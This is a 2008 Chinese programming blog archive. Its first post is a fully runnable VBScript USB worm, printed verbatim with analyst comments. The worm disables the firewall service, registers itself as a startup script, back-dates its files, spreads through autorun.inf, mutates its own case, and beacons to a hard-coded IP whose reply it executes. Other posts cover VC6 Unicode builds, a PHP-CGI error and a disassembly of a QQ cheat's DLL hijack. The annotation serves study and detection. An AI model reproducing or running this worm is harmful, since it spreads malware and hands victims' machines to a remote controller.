一个U盘病毒VBS脚本（恶意样本：仅供分析与检测用途，切勿运行）
Oct 29th, 2008 by song

[code]On error ResUme NeXT
' ===== ANALYST NOTES (USB worm sample, blog post 2008) =====
' Annotations only -- the code is left byte-for-byte as found. Do NOT execute it.
' Obfuscation is uniform: every string is StrReverse()'d and/or Unescape()'d and the
' bodies of the helper procedures are Execute'd from such strings. The decoded value is
' given at each use. Indicators worth extracting for detection:
'   files   : %SystemRoot%\System32\prncfg.vbs, <drive>:\Eva.vbs, <drive>:\autorun.inf (attributes R+H+S)
'   registry: HKLM\Software\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0\0
'             HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\0  (Script=%WinDir%\System32\prncfg.vbs)
'   network : GET http://202.119.104.100/zzb/eva/count.asp?a=<COMPUTERNAME\user>, User-Agent "Evar"
'   other   : "net stop sharedaccess", repeated "cmd /c date ..." to back-date dropped files
' "On Error Resume Next": every failure below is silently swallowed.
' CreateObject("Scripting.FileSystemObject") -- the argument is the class name reversed.
Set Fso=cREaTeObjEct(STRREVErsE("tCeJbOMetsYSELIf.gnItPIRCs"))
' CreateObject("WScript.Shell")
SET wSHshEll=cReaTEOBJEcT(strREverSE("LlEhs.TPIrCSW"))
dIm drI_lISt,DrI_lisT0
DiM IssEnD
' IssEnd: 0 until the one-time beacon in the main loop has succeeded.
ISsEnd=0
' Real current date; the script changes the system clock several times and restores it from this.
c_TIMe=datE()
' Stops the Windows Firewall / Internet Connection Sharing service (window style 0 = hidden).
WshshELL.ruN "Net SToP sHaReDaccEsS",0
' Drive collection consumed by LISTDRV() below.
seT DrvS=fSO.Drives
' GetSpecialFolder(1) = the System folder (%SystemRoot%\System32).
sYsdIr=fSo.GetSpeCIalfoLDeR(1)
thiSPATH=WscRIPt.sCrIPtfuLLNAMe
' Read this script's own source; every copy it drops is derived from Scopy through VS().
sEt FC=fSo.OPENTExTFilE(tHiSpaTH,1)
Scopy=Fc.rEAdaLl
fC.CLoSE
SET fC=NotHInG
' Persistence. Unescape(StrReverse(...)) of the payload is a .reg file:
'   Windows Registry Editor Version 5.00
'   [HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\0]
'   [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0\0]
'   each with "Script"="%WinDir%\\System32\\prncfg.vbs", "Parameters"="", "ExecTime"=hex(b):00,00,... (16 zero bytes)
' i.e. the dropped copy is registered as a machine Group Policy startup script.
cAlL wriTEFILe(sYsdIr&"\SYsInfO.reg",UNescapE(sTRReverSE("00C2%00c2%00C2%00C2%00c2%00C2%00c2%00c2%00C2%00c2%00c2%00c2%00C2%00c2%00c2%00a3%92%B82%XEHD3%22%EMItCeXe22%a0%D0%02%22%22%D3%22%SrETeMARAp22%a0%d0%02%22%sBv.gfcNrpc5%C5%23meTSYSC5%C5%52%RIdniW52%22%d3%22%tpIrCS22%A0%D0%02%d5%0c5%0c5%puTrAtsc5%STpIRcsc5%ENiHcaMc5%EtATsc5%YcILoP02%puorGc5%noiSrEVTneRRUcc5%sWodNiwc5%tFoSOrcimc5%erAWTFOsC5%enihcam_lACOL_yEKHb5%A0%d0%A0%d0%02%00c2%00c2%00C2%00C2%00C2%00c2%00c2%00c2%00C2%00c2%00c2%00C2%00C2%00C2%00c2%00A3%92%B82%xEhD3%22%EmItCexe22%a0%D0%02%22%22%d3%22%SReteMaRAp22%A0%d0%02%22%SbV.gFcnrpc5%C5%23meTsYSC5%C5%52%riDniW52%22%D3%22%tpirCs22%A0%d0%02%d5%0c5%0C5%puTRAtsC5%StpIRcsc5%meTsysc5%SwODNiWC5%TFOsoRCiMc5%sEICiLOpC5%eraWtfosc5%ENihcAM_LACoL_yeKHB5%a0%D0%A0%d0%03%03%e2%53%02%E6%f6%96%37%27%56%65%02%27%F6%47%96%46%54%02%97%27%47%37%96%76%56%25%02%37%77%F6%46%E6%96%75%")))
' Silent import, then the .reg file is removed. Note the relative file name on the regedit
' command: it only works if the working directory is the System folder.
wShSHell.ruN "REGEDiT /s sysinFo.REG",0
wsCRIPt.SLeep 200
fso.dElETEfILe SYSdiR&"\sYsiNFO.REg",true
' Branch 1: this instance is the installed copy (its own path lies inside the System folder).
if iNsTr(thISPATH,SysdIR)>0 thEN
Dri_LIsT0=LISTDrV()
' Derive a second date by decrementing the 4th character of Date() (which digit that is depends on
' the locale's short-date format, e.g. the last digit of the year for yyyy-MM-dd), set the clock to
' it, drop the autorun pair on every ready drive, then restore the clock: the dropped files carry a
' back-dated timestamp (timestomping via the system clock rather than via file APIs).
O_time=Left(C_tIme,3)&cstR(INT(mid(C_Time,4,1))-1)&rIgHt(C_Time,Len(c_timE)-4)
wSHShell.run "cmd /C DAte "&o_time,0
WsCrIpt.slEEP 10000
foR DRi_i=1 TO leN(drI_lIst0)
CaLL WriTeaUtO(mID(dRI_List0,Dri_I,1)&":\")
NEXT
wsHSHElL.rUN "Cmd /C DatE "&C_TIMe,0
' Victim identifier for the beacon: COMPUTERNAME\user from WMI Win32_ComputerSystem
' ("Evar" is substituted when no user is logged on).
comPUterNAme="":uSernaME=""
set OBjwmiservIcE=geToBjECt("winMgmTs:{imPErsONatIONlevel=imPersonaTe}!\\.\roOt\CImV2")
set ColCoMPUTerS = ObJwMIsErvice.ExEcQuery("SEleCt * froM Win32_cOmpuTERsYsTem")
foR eAch oBJCOmputer IN colCOMPUTErs
cOmpUtErnAmE=OBjComPuTEr.nAMe
userNAME=OBJcOMPUtEr.UsERnAMe
nEXt
if uSeRnAmE="" tHEn usERname="Evar"
If INstr(uSERnAme,"\")<=0 ThEn
useRnaMe=COMpuTERnAmE&"\"&usernaMe
End iF
' Main loop: beacon once, then watch for newly attached drives every second, forever.
Do
if IsseNd=0 then
' CreateObject("Msxml2.ServerXMLHttp"); synchronous GET to
'   http://202.119.104.100/zzb/eva/count.asp?a=<COMPUTERNAME\user>   with User-Agent "Evar".
' If the response body begins with "execute" the whole body is handed to Execute: whoever
' controls that host (or the plain-HTTP path to it) can run arbitrary VBScript here.
seT XmL=CreATEobjEct(stRrEVERse("ptTHLMxreVRES.2LmxSm"))  
xmL.OPEN "geT",StRrEVerSe(unESCApE("%3D%61%3F%70%73%61%2E%74%6e%75%6f%63%2f%61%76%65%2f%62%7a%7a%2F%30%30%31%2E%34%30%31%2e%39%31%31%2e%32%30%32%2F%2f%3A%70%74%74%68"))&usErNAMe,0
Xml.SeTrequesTheaDEr "uSer-AGent","EvaR"
XML.Send()
' Only a successful request sets IssEnd; otherwise the beacon is retried on the next iteration.
if ERR.NUMbER=0 thEn
IsSEND=1
res=Xml.REspOnsetExt
IF uCASe(LeFT(REs,7))=uCAse("exECuTe")  then ExecUtE Res
Else
Err.CLEAR
End IF
SeT xmL=nOtHiNG
END If

' Any drive letter absent from the previous snapshot (a newly inserted stick) gets the autorun pair.
Dri_LIst=liStdRV()
FoR DRI_k=1 tO lEn(drI_liST)
If INstR(DRI_LiST0,MiD(dRI_list,dRi_K,1))<=0 theN
CAlL wRITEauto(mId(DrI_LIst,dRI_k,1)&":\")
End if
NEXt
DRI_LIST0=drI_lIsT
wSCRiPt.sleeP 1000
lOOp
' Branch 2: launched from a removable drive through autorun.inf (as Eva.vbs).
ELSE
' Open the drive (current directory) in a maximized Explorer window (style 3) so the user
' sees the drive open as expected...
WShSHeLL.rUn "ExPLorER .\",3
WScRIPt.sleEp 2000
' ...then bring the "我的电脑" ("My Computer") window to the front (Unescape of
' %u6211%u7684%u7535%u8111) and send Alt+Space, C -- presumably the system-menu Close
' accelerator, i.e. the window the user launched the drive from is closed.
WsHshELL.appaCTIVaTe unEsCape(lcaSe("%u6211%u7684%u7535%u8111"))
WsHSHEll.sEndkEys uCaSe("% C")
' Single-instance check: count wscript.exe processes via WMI Win32_Process (this one
' included); two or more means another copy is already running -> quit.
rUnfLAG=0
fOr eACh pS in gETobJECT _
("WinmGmtS:\\.\rOoT\cIMV2:wiN32_pRocEsS").INSTAncES_
if LcasE(PS.nAMe)=LCASe("wSCRIPT.EXe") tHeN
RUNFLAg=runfLAg+1
end IF
NEXt
If RUNfLaG>=2 thEn wsCRipT.QUIT
' Install: set the clock to the System folder's creation date (date part only), drop a
' case-randomised copy (VS) as %SystemRoot%\System32\prncfg.vbs so its timestamp matches
' the OS installation, restore the clock and start it (that instance takes Branch 1).
SEt Sf=FSO.gETFOLdEr(SYSdir)
F_TIMe=leFT(sf.DateCreaTeD,iNstr(sf.DATeCREAteD," ")-1)
WsHSHEll.Run "CmD /C DAtE "&F_tIMe,0
wScRIPT.SLEEp 100
calL wriTEFILe(SySDIR&LcAse("\PRNcFG.vBs"),Vs(SCOPY))
wsHSHell.Run "CMD /c dATE "&C_tImE,0
wsHshelL.rUN SySDir&"\pRnCFG.VbS"
EnD IF
functiOn VS(str)
' Polymorphic re-packer. The Execute'd string (Unescape, then StrReverse) decodes to:
'   For i=1 To Len(str)
'     c=UCase(Mid(str,i,1))
'     Randomize
'     If Int(Rnd()*100)>50 Then vs=vs&LCase(c) Else vs=vs&c
'   Next
'   vs=Replace(vs,UCase("%u"),LCase("%u"))
' Each character of the script source is randomly upper/lower-cased (VBScript is case
' insensitive, so behaviour is unchanged), then "%U" is put back to "%u" so the Unicode
' escapes still decode. Every dropped copy therefore has a different byte pattern --
' exact-match signatures will miss it; detect on decoded strings/behaviour instead.
ExeCutE strReVErse(uNescAPE("%29%29%22u%25%22%28ESAcl%2c%29%22u%25%22%28eSacU%2CsV%28eCALPeR%3DsV%0D%0AtxEN%0d%0AFI%20dNE%0D%0Ac%26sV%3dSV%0d%0aeSlE%0D%0A%29c%28EsacL%26sv%3Dsv%0d%0AnEHT%2005%3e%29001*%29%28dNr%28tnI%20fI%0D%0AEZIMoDnAR%0d%0a%29%291%2ci%2CRts%28DIm%28eSAcu%3dC%0d%0A%29RTs%28Nel%20OT%201%3Di%20roF"))
eND FUNCTiOn
FuNcTioN LISTdRV()
' Returns the drive letters of all ready drives as one string (e.g. "CDE"). Decoded body:
'   Dim tmp_list
'   tmp_list=""
'   For Each drv In drvs
'     If drv.IsReady Then tmp_list=tmp_list&drv.DriveLetter
'   Next
'   listdrv=tmp_list
' Uses the script-level DrvS collection (fso.Drives) set up at the top of the file.
' The main loop diffs two of these strings to spot a newly inserted drive.
EXEcUTe STrreVERSE(UNeSCAPE("TsiL_pMT%3DVRDtsil%0d%0ATXEN%0d%0AFI%20DNe%0d%0AretteLEViRD.vrD%26tsIl_Pmt%3DTsIL_PmT%0d%0anEhT%20YdAERSI.VrD%20fi%0d%0aSVRd%20Ni%20vRd%20hcaE%20rof%0D%0a%22%22%3dTSIL_pMT%0D%0aTSIL_pmt%20MID"))
END FUnCtiON

suB WRITeAUtO(PATH)
' Infects one drive root (PATH = "X:\"). First the Execute'd string, which decodes to:
'   If fso.FolderExists(path&"autorun.inf") Then
'     fso.MoveFolder path&"autorun.inf", path&rnd()
'   ElseIf fso.FileExists(path&"autorun.inf") Then
'     fso.DeleteFile path&"autorun.inf",True
'   End If
' i.e. it defeats the common "autorun.inf as a folder" immunisation by renaming that
' folder to a random number, and deletes any existing autorun.inf file.
exECute STRREVErSE(UNEsCapE("FI%20DNE%0d%0AeUrT%2C%22fni.NUrotUA%22%26Htap%20ELiFETelEd.Osf%0d%0aneHT%20%29%22fnI.nUrOTUA%22%26HtAp%28StsixeeLiF.Osf%20fIEslE%0D%0a%29%28dnr%26htAP%2C%22fNI.NurOTuA%22%26HTap%20rEDLOfevOM.OSF%0d%0aNEhT%20%29%22FnI.nUrOTUA%22%26Htap%28STSIXeREDLOF.Osf%20FI"))
' Autorun template: the open / explore / find verbs all run wscript.exe "EVA.Vbs", so a
' double-click, right-click Explore, or Search on the drive launches the worm.
Cmdstr="ShELL\*\commAND=wsCrIpT.eXe "&CHR(34)&"EVA.Vbs"&cHR(34)
AuTOSTR="[AUtorUn]"&VBcrLF&"OPeN="&vbcrLF&REPlace(CMdstr,"*","OPeN")&vBCrLf&rePlACe(cmDsTr,"*","EXplorE")&VbcrlF&RePLacE(cMDsTr,"*","fInD")
' Both files are written hidden+system+read-only by WriteFile; Eva.vbs is a freshly
' case-randomised copy of this script (see VS), so no two sticks carry identical bytes.
cALL WriTEFIle(PATh&uCASE("aUTorUN.iNf"),aUToSTR)
CalL WrITEFiLE(Path&"Eva.VbS",vs(sCOPY))
eNd SUB

SUb WriTEFiLe(FPATH,CONtenT)
' Overwrites FPATH with CONTENT and hides it. Decoded body:
'   If fso.FileExists(fpath) Then fso.DeleteFile fpath,True
'   Set fc=fso.OpenTextFile(fpath,2,True)
'   fc.Write content
'   fc.Close
'   Set fc=Nothing
'   Set fa=fso.GetFile(fpath)
'   fa.Attributes=7
'   Set fa=Nothing
' Attributes=7 = ReadOnly(1)+Hidden(2)+System(4): the dropped files are invisible with
' default Explorer settings. The force flag on DeleteFile removes an existing read-only copy first.
EXEcuTE sTRrEVeRse(uNESCAPe("gNIHton%3daF%20TeS%0D%0A7%3dseTuBIrTta.aF%0D%0A%29htapF%28EliftEg.oSF%3Daf%20Tes%0D%0aGnIhToN%3DCF%20TES%0d%0AEsolC.CF%0d%0atNETnOc%20eTIrW.CF%0D%0A%29EURT%2C2%2chtAPf%28eLiFtxEtNEPO.OSF%3dCF%20Tes%0d%0aeURT%2cHTAPF%20ELifeTeLeD.Osf%20nEHt%20%29htAPF%28stsiXEElif.osf%20FI"))
eND Sub
[/code]

VC6 UNICODE
Oct 23rd, 2008 by song

一：如何在 VC6 中进行 Unicode 编译  
 1. 菜单 Build –> Configurations –> Add，添加一个 Unicode Debug 配置。  
 2. 菜单 Build –> Set Active Configuration，选择 Win32 Unicode Debug。  
 3. 菜单 Project –> Settings –> C/C++ 属性页 –> Category 中选择 Preprocessor，在 Preprocessor definitions 中添加 _UNICODE（通常还应同时添加 UNICODE：_UNICODE 控制 CRT/tchar.h 的映射，UNICODE 控制 Win32 API 选择 A 版还是 W 版，只定义其一会得到混合的 A/W 调用）。  
 4. 菜单 Project –> Settings –> Link 属性页 –> Category 中选择 Output，在 Entry-point symbol 中写入 wWinMainCRTStartup。如不执行该步骤，链接时会出现错误 "unresolved external symbol _WinMain@16"。  
 二：把 char 全换成 TCHAR  
 1. 所有的字符串字面量用 _T() 宏包起来  
 比如  
 char sz[] = "aaa";  
 改成  
 TCHAR sz[] = _T("aaa");  
 2. 修改字符串函数：  
 如 strlen 改成 _tcslen，也可以改成 lstrlen。  
 注意：换成 TCHAR 后，所有长度和缓冲区大小参数都必须按字符数而不是字节数计算（sizeof(buf)/sizeof(TCHAR)，不要再直接用 sizeof(buf)），否则在 Unicode 配置下会出现缓冲区溢出或截断。  

用户体验
Oct 23rd, 2008 by song

用网站的人都喜欢简单易用；做网站的人总会想：我功能强大，你一定喜欢！
其实不然。用户能花多少时间在你这个“强大”的站上？它能带给他多少利益、趣味或其他有价值的东西？不要一味地让用户贡献，那是行不通的。
“网上家园”的概念离现实还有一定距离：人家自己在家就有一个家庭，干嘛跑到你网上来沟通？不是没有，但是不多。

Php-cgi.exe CGI Error!
Oct 23rd, 2008 by song

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers.

First check the IIS script map: .php must be handled by the CGI binary (php-cgi.exe). Mapping it to php.exe, the CLI SAPI, yields exactly this error because the CLI never emits HTTP headers. The mapping lives here:
REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\w3svc\parameters\Script Map]
".php"="[PUT PATH HERE]\\php.exe"

Then, in php.ini, make sure cgi.force_redirect is off (required under IIS):


; cgi.force_redirect is necessary to provide security running PHP as a CGI under
; most web servers.  Left undefined, PHP turns this on by default.  You can
; turn it off here AT YOUR OWN RISK
; **You CAN safely turn this off for IIS, in fact, you MUST.**
; With it off, the web server configuration is the only thing preventing a browser from
; invoking the CGI binary directly: keep php-cgi.exe outside the web root (not browsable)
; and let only the IIS script map above invoke it.
cgi.force_redirect = 0

分析彩虹外挂（msimg32.dll 劫持）
Oct 17th, 2008 by song

彩虹外挂先删除 QQ 目录下的原版 MSIMG32.dll：先用 SetFileAttributesA 把属性清成 FILE_ATTRIBUTE_NORMAL（0x80），再 DeleteFileA（返回值未检查）。



; Step 1 (launcher): remove the genuine MSIMG32.dll from the QQ directory.
012581F3    83C4 0C         add     esp, 0C
; Append "MSIMG32.dll" to the path buffer at [ebp-128]. 01291DC0 takes two cdecl args
; (esp += 8 after); presumably a strcat-style helper -- its body is not in the listing.
012581F6    68 2C4D2C01     push    012C4D2C                         ; ASCII "MSIMG32.dll"
012581FB    8D8D D8FEFFFF   lea     ecx, dword ptr [ebp-128]
01258201    51              push    ecx
01258202    E8 B99B0300     call    01291DC0
01258207    83C4 08         add     esp, 8
; SetFileAttributesA(path, 0x80 = FILE_ATTRIBUTE_NORMAL): strips read-only/hidden/system
; so the delete below cannot be refused on attributes.
0125820A    68 80000000     push    80
0125820F    8D95 D8FEFFFF   lea     edx, dword ptr [ebp-128]
01258215    52              push    edx
01258216    FF15 98312C01   call    dword ptr [<&KERNEL32.SetFileAtt>; kernel32.SetFileAttributesA
; DeleteFileA(path). Once the real DLL is gone, QQ.exe resolves msimg32.dll from whatever
; is placed in its own directory next (the application directory precedes System32 in the
; default DLL search order). The return value is never tested.
0125821C    8D85 D8FEFFFF   lea     eax, dword ptr [ebp-128]
01258222    50              push    eax
01258223    FF15 9C312C01   call    dword ptr [<&KERNEL32.DeleteFile>; kernel32.DeleteFileA
01258229    C785 B0FBFFFF 0>mov     dword ptr [ebp-450], 0
; 01290D50([ebp-33C], 0, 0x10), cdecl: looks like memset of a 16-byte struct. The size and
; the later CloseHandle of [ebp-33C] are consistent with a PROCESS_INFORMATION -- unconfirmed.
01258233    6A 10           push    10
01258235    6A 00           push    0
01258237    8D8D C4FCFFFF   lea     ecx, dword ptr [ebp-33C]
0125823D    51              push    ecx
0125823E    E8 0D8B0300     call    01290D50
01258243    83C4 0C         add     esp, 0C
; [ebp-4] = 0: together with the "[ebp-4] = -1 ; call cleanup" sequence in the CreateProcess
; excerpt this looks like an MSVC exception-handling state variable -- not verifiable here.
01258246    C745 FC 0000000>mov     dword ptr [ebp-4], 0
0125824D    8D95 B8FBFFFF   lea     edx, dword ptr [ebp-448]
01258253    52              push    edx





然后把外挂自带的 msimg32.dll 复制到 QQ 目录（CopyFileA，bFailIfExists = FALSE，直接覆盖）——典型的 DLL 搜索顺序劫持/替换：


; Step 2 (launcher): plant the attacker's msimg32.dll in the QQ directory.
; 01291DB0 takes two cdecl args (esp += 8); its first argument is pushed before this excerpt.
; Presumably copies the QQ directory path into the buffer at [ebp-558] -- not verifiable here.
012583EB    8D8D A8FAFFFF   lea     ecx, dword ptr [ebp-558]
012583F1    51              push    ecx
012583F2    E8 B9990300     call    01291DB0
012583F7    83C4 08         add     esp, 8
; Append "msimg32.dll" (same two-arg helper as in step 1) -> "<QQ dir>\msimg32.dll".
012583FA    68 604D2C01     push    012C4D60                                ; ASCII "msimg32.dll"
012583FF    8D95 A8FAFFFF   lea     edx, dword ptr [ebp-558]
01258405    52              push    edx
01258406    E8 B5990300     call    01291DC0
0125840B    83C4 08         add     esp, 8
; CopyFileA(lpExistingFileName = "msimg32.dll" (bare name, resolved against the launcher's
; current directory), lpNewFileName = [ebp-558], bFailIfExists = 0 -> overwrite).
; Return value is not checked.
0125840E    6A 00           push    0
01258410    8D85 A8FAFFFF   lea     eax, dword ptr [ebp-558]
01258416    50              push    eax
01258417    68 6C4D2C01     push    012C4D6C                                ; ASCII "msimg32.dll"
0125841C    FF15 D4312C01   call    dword ptr [<&KERNEL32.CopyFileA>]       ; kernel32.CopyFileA
; Third stack argument of this function ([ebp+10]) is saved to a global at 012FF104; use not visible.
01258422    8B4D 10         mov     ecx, dword ptr [ebp+10]
01258425    890D 04F12F01   mov     dword ptr [12FF104], ecx
; Zero [ebp-6B8] plus 0x10 dwords from [ebp-6B4]: 68 bytes in total, which equals
; sizeof(STARTUPINFOA) (0x44) -- likely the STARTUPINFO for the CreateProcessA that
; follows, with cb filled in after this excerpt. Unconfirmed.
0125842B    C785 48F9FFFF 0>mov     dword ptr [ebp-6B8], 0
01258435    B9 10000000     mov     ecx, 10
0125843A    33C0            xor     eax, eax
0125843C    8DBD 4CF9FFFF   lea     edi, dword ptr [ebp-6B4]
01258442    F3:AB           rep     stos dword ptr es:[edi]



 接着用 CreateProcessA 启动 QQ（此时 QQ.exe 会从自己的目录加载被替换的 msimg32.dll）：

; Step 3 (launcher): CreateProcessA. The listing starts after the two last-to-be-pushed
; arguments (lpProcessInformation, lpStartupInfo); the eight shown are, in call order:
;   lpApplicationName    = [ebp-128]  -> "D:\soft\Tencent\QQ2008II Beta1\QQ.exe" (see stack dump)
;   lpCommandLine        = [ebp-328]  -> "\"...\caihong hok\CaiHong.exe\""  (see stack dump)
;   lpProcessAttributes  = 0, lpThreadAttributes = 0, bInheritHandles = 0
;   dwCreationFlags      = 0x20 (NORMAL_PRIORITY_CLASS), lpEnvironment = 0, lpCurrentDirectory = 0
; Note the [ebp-128] buffer held "...MSIMG32.dll" in step 1; it has been rebuilt in between
; (not shown). QQ.exe is the image actually started; its command line names CaiHong.exe.
0125845C    6A 00           push    0
0125845E    6A 00           push    0
01258460    6A 20           push    20
01258462    6A 00           push    0
01258464    6A 00           push    0
01258466    6A 00           push    0
01258468    8D8D D8FCFFFF   lea     ecx, dword ptr [ebp-328]
0125846E    51              push    ecx
0125846F    8D95 D8FEFFFF   lea     edx, dword ptr [ebp-128]
01258475    52              push    edx
01258476    FF15 A8312C01   call    dword ptr [<&KERNEL32.CreateProcessA>]  ; kernel32.CreateProcessA
; Failure -> [ebp-450] = 1 (an error flag for the caller, presumably).
0125847C    85C0            test    eax, eax
0125847E    75 0A           jnz     short 0125848A
01258480    C785 B0FBFFFF 0>mov     dword ptr [ebp-450], 1
; [ebp-4] = -1 then a call into the local routine at 01258498: the MSVC unwind/cleanup
; pattern. That routine closes the handle at [ebp-33C] if it is non-zero (hProcess of the
; PROCESS_INFORMATION zeroed in step 1, if that reading is right) and continues past the excerpt.
0125848A    C745 FC FFFFFFF>mov     dword ptr [ebp-4], -1
01258491    E8 02000000     call    01258498
01258496    EB 43           jmp     short 012584DB
01258498    83BD C4FCFFFF 0>cmp     dword ptr [ebp-33C], 0
0125849F    74 18           je      short 012584B9
012584A1    8B85 C4FCFFFF   mov     eax, dword ptr [ebp-33C]
012584A7    50              push    eax
012584A8    FF15 AC312C01   call    dword ptr [<&KERNEL32.CloseHandle>]     ; kernel32.CloseHandle
; Loads this function's first argument ([ebp+8]); what is done with it lies outside the listing.
012584AE    8B4D 08         mov     ecx, dword ptr [ebp+8]



CreateProcessA 调用时的参数堆栈（OllyDbg）。注意 ApplicationName 是 QQ.exe，而 CommandLine 却是 CaiHong.exe 的路径：



0012F4AC   0012FA74  |ModuleFileName = "D:\soft\Tencent\QQ2008II Beta1\QQ.exe"
0012F4B0   0012F874  |CommandLine = ""D:\soft\Tencent\QQ\caihong hok\CaiHong.exe""
0012F4B4   00000000  |pProcessSecurity = NULL
0012F4B8   00000000  |pThreadSecurity = NULL
0012F4BC   00000000  |InheritHandles = FALSE
0012F4C0   00000020  |CreationFlags = NORMAL_PRIORITY_CLASS
0012F4C4   00000000  |pEnvironment = NULL
0012F4C8   00000000  |CurrentDir = NULL
0012F4CC   0012F4E4  |pStartupInfo = 0012F4E4
0012F4D0   0012F860  \pProcessInfo = 0012F860
0012F4D4   7C80B6A1  kernel32.GetModuleHandleA
0012F4D8   00000000



; Indirect call through a function pointer kept at [ebp-174] with three cdecl arguments
; (esp += 0x0C afterwards). Where the pointer comes from is outside this excerpt --
; likely resolved earlier (e.g. GetProcAddress), unconfirmed.
0040158F   .  52            push    edx
00401590   .  68 F8994000   push    004099F8
00401595   .  68 F4994000   push    004099F4
0040159A   .  FF95 8CFEFFFF call    dword ptr [ebp-174]                     ; author's note: this is where control goes back to caihong.exe -- the stub's job is done and it is about to bow out
004015A0   .  83C4 0C       add     esp, 0C
; Result kept in [ebp-44] and passed to a second pointer at [ebp-1C] (one cdecl argument).
004015A3   .  8945 BC       mov     dword ptr [ebp-44], eax
004015A6   .  8B45 BC       mov     eax, dword ptr [ebp-44]
004015A9   .  50            push    eax
004015AA   .  FF55 E4       call    dword ptr [ebp-1C]
004015AD   .  83C4 04       add     esp, 4
; Branch on the first call's result (zero / non-zero); both targets lie past the excerpt.
004015B0   >  837D BC 00    cmp     dword ptr [ebp-44], 0
004015B4   .  74 08         je      short 004015BE

伪 msimg32.dll 的主要逻辑：装载/转发真正 msimg32.dll 的导出函数，然后启动一个线程。下面这个函数先检查宿主进程是否为 QQ.exe 或 TM.exe，是则 LoadLibraryA 加载 CaiHong.dll（合法的 msimg32.dll 没有理由按宿主进程名去 LoadLibrary，这本身就是一个很好的狩猎特征）：

; Routine in the planted msimg32.dll at 003A10F0. stdcall with one 4-byte argument
; ("retn 4"); always returns 0. Decides whether to pull CaiHong.dll into the host
; process. Helper 003A1380 and the caller are outside the listing.
003A10EF    CC              int3
003A10F0    55              push    ebp
003A10F1    8BEC            mov     ebp, esp
003A10F3    81EC 1C020000   sub     esp, 21C
; [3A9030] copied to [ebp-4] and re-checked through 003A1355 before returning -- the MSVC /GS
; cookie pattern (__security_cookie / __security_check_cookie); not confirmed from here.
003A10F9    A1 30903A00     mov     eax, dword ptr [3A9030]
003A10FE    8945 FC         mov     dword ptr [ebp-4], eax
; GetEnvironmentVariableA("CaiHongPath", buf@[ebp-110], 0x103). A non-zero return (variable
; present) jumps straight to the epilogue: nothing is loaded in that case. The meaning of the
; variable is not visible here.
003A1101    68 03010000     push    103
003A1106    8D85 F0FEFFFF   lea     eax, dword ptr [ebp-110]
003A110C    50              push    eax
003A110D    68 5C713A00     push    003A715C                                           ; ASCII "CaiHongPath"
003A1112    FF15 20703A00   call    dword ptr [<&KERNEL32.GetEnvironmentVariableA>]    ; kernel32.GetEnvironmentVariableA
003A1118    85C0            test    eax, eax
003A111A    0F85 B6000000   jnz     003A11D6
; Variable absent: GetModuleFileNameA(NULL, path@[ebp-218], 0x104) = full path of the host .exe.
003A1120    68 04010000     push    104
003A1125    8D8D E8FDFFFF   lea     ecx, dword ptr [ebp-218]
003A112B    51              push    ecx
003A112C    6A 00           push    0
003A112E    FF15 1C703A00   call    dword ptr [<&KERNEL32.GetModuleFileNameA>]         ; kernel32.GetModuleFileNameA
; idx@[ebp-21C] = lstrlenA(path) - 1
003A1134    8D95 E8FDFFFF   lea     edx, dword ptr [ebp-218]
003A113A    52              push    edx
003A113B    FF15 18703A00   call    dword ptr [<&KERNEL32.lstrlenA>]                   ; kernel32.lstrlenA
003A1141    83E8 01         sub     eax, 1
003A1144    8985 E4FDFFFF   mov     dword ptr [ebp-21C], eax
003A114A    EB 0F           jmp     short 003A115B
; Loop: scan backwards for '\' (0x5C). Exits with idx at the last backslash, or -1 if there
; is none (the "jl" at 003A1162 stops before reading below the buffer).
003A114C    8B85 E4FDFFFF   mov     eax, dword ptr [ebp-21C]
003A1152    83E8 01         sub     eax, 1
003A1155    8985 E4FDFFFF   mov     dword ptr [ebp-21C], eax
003A115B    83BD E4FDFFFF 0>cmp     dword ptr [ebp-21C], 0
003A1162    7C 17           jl      short 003A117B
003A1164    8B8D E4FDFFFF   mov     ecx, dword ptr [ebp-21C]
003A116A    0FBE940D E8FDFF>movsx   edx, byte ptr [ebp+ecx-218]
003A1172    83FA 5C         cmp     edx, 5C
003A1175    75 02           jnz     short 003A1179
003A1177    EB 02           jmp     short 003A117B
003A1179  ^ EB D1           jmp     short 003A114C
; basename = path + idx + 1 ([ebp+eax-217]); lstrcmpiA(basename, "QQ.exe") -- case-insensitive;
; equal (eax == 0) -> load.
003A117B    68 68713A00     push    003A7168                                           ; ASCII "QQ.exe"
003A1180    8B85 E4FDFFFF   mov     eax, dword ptr [ebp-21C]
003A1186    8D8C05 E9FDFFFF lea     ecx, dword ptr [ebp+eax-217]
003A118D    51              push    ecx
003A118E    FF15 14703A00   call    dword ptr [<&KERNEL32.lstrcmpiA>]                  ; kernel32.lstrcmpiA
003A1194    85C0            test    eax, eax
003A1196    74 1D           je      short 003A11B5
; Otherwise compare with "TM.exe"; any other host process -> return without loading anything.
003A1198    68 70713A00     push    003A7170                                           ; ASCII "TM.exe"
003A119D    8B95 E4FDFFFF   mov     edx, dword ptr [ebp-21C]
003A11A3    8D8415 E9FDFFFF lea     eax, dword ptr [ebp+edx-217]
003A11AA    50              push    eax
003A11AB    FF15 14703A00   call    dword ptr [<&KERNEL32.lstrcmpiA>]                  ; kernel32.lstrcmpiA
003A11B1    85C0            test    eax, eax
003A11B3    75 21           jnz     short 003A11D6
; Host is QQ.exe or TM.exe: 003A1380(buf@[ebp-110], "CaiHong.dll") (cdecl, two args) --
; presumably builds the DLL's path into buf (on this path buf was never written by
; GetEnvironmentVariableA, so 003A1380 must fill it itself) -- then LoadLibraryA(buf).
; The HMODULE returned by LoadLibraryA is discarded.
003A11B5    68 78713A00     push    003A7178                                           ; ASCII "CaiHong.dll"
003A11BA    8D8D F0FEFFFF   lea     ecx, dword ptr [ebp-110]
003A11C0    51              push    ecx
003A11C1    E8 BA010000     call    003A1380
003A11C6    83C4 08         add     esp, 8
003A11C9    8D95 F0FEFFFF   lea     edx, dword ptr [ebp-110]
003A11CF    52              push    edx
003A11D0    FF15 08703A00   call    dword ptr [<&KERNEL32.LoadLibraryA>]               ; kernel32.LoadLibraryA
; Epilogue: eax = 0 on every path; cookie check; stdcall return pops the single argument.
003A11D6    33C0            xor     eax, eax
